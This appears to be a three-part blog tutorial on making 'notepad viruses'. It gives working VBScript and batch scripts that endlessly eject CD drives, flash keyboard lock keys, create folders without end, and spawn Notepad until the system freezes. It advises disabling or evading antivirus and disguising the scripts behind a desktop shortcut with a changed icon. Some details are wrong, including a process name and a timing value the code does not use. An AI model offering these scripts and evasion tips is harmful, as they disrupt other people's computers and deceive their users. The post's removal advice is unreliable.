[Part 1]
You can make a simple virus using notepad.actually it is a VB script. make note this is a virus
- Open note pad
- Copy the code below
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
End If
Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next ‘ cdrom
End If
- paste it on notepad now save it as fox.vbs
- Run and see
How to kill the virus
just easy hidden steps.after you run the virus go to task manager and then go to processes tab.now search for “wpscript.exe” file.now click End Process and yes.It will be healed
[Part 2]
Now I’m gonna tell you how to write a more advanced viruses using notepad.here we learn two about them.
these viruses are coded to run as vbscripts.so these viruses will only work on windows computers.And though these viruses are bit advanced anybody can kill it just using simple hidden steps.Remember that these files will be tracked from virus guards as “joke/vbtool” file.so turn off it or use any other proper functions to keep your virus guard away from the file what we gonna make now.
How to kill the virus
just easy hidden steps.after you run the virus go to task manager and then go to processes tab.now search for “wpscript.exe” file.now click End Process and yes.It will be healed
Here we gonna build two viruses
after copying down the codes below paste it on a new notepad and save it as something.vbs(change the name as you want,but not the vbs extension). you’ll see a file with different kind of icon.okay so you have made a virus already.run it and check
Keyboard lights flashing
in this case you can make your keyboard lights (num lock,caps lock,scroll lock) go mad.they will light up and go down as fast as and in the order as you want.just copy the code given below(remember that this will make lights go crazy and also it makes your typing go crazy with upper case and lower case shuffles).copy the code below and save it as anyname.vbs
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
now change the value 50 as you want.it will change the interval between lights flashing.and also you can change the lighting up order just by changing the order in last 3 rows of the code except looping line
CD/DVD rom ejects continually
i have already written how to do this in that earlier post.but it doesn’t work continually.here we gonna make a speedy and more effective version of same virus.copy the code below and save it asanyname.vbs
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >=1 then
do
For i=0 to colCDROMs.COunt -1
colCDROMs.item(i).Eject
Next 'cdrom
loop
End If
in this case you can speed it up (the interval between loading and ejecting) just by adding following line as much as you want.
For i=0 to colCDROMs.COunt -1
colCDROMs.item(i).Eject
Next 'cdrom
if u add this line twice in virus coding…it will work twice as fast.do not remove “loop” function or it will stop working continually.
[Part 3]
In the Part 2 of Notepad virus guide,I told you about making virus programs (probably unwanted programs ) that can affect computer hardware such as your keyboard lights and CD-drive door. In this part, I’m gonna show you how to make notepad viruses that can affect your OS and software. Here we go
Keep in mind that these programs do not heavily affect your computer. You can kill all those virus just by restarting, logging off or just by using Task manager. So don’t panic
Before Starting
- Open Notepad
- Select a code from below and paste it in notepad
- Save it as <name>.bat
- That’s all.If you want to make it more realistic make a shortcut on the desktop and change the icon of it
Making 1000 folders in One-Click
@echo off
:ionhax
md %random%
goto ionhax
You will have to delete all the 1000 folders manually if you test this.. So it’s your own choice
Matrix from CMD ( random text in command prompt)
@echo off
color 02
:ionhax
echo %random%%random%%random%%random%%random%%random%%random%%random%
goto ionhax
Freeze Computer (open app continually)
@echo off
:ionhax
START notepad.exe
goto ionhax
Do not test this in your computer, if your computer does not have enough RAM
Part 4 to be posted
0 comments:
Post a Comment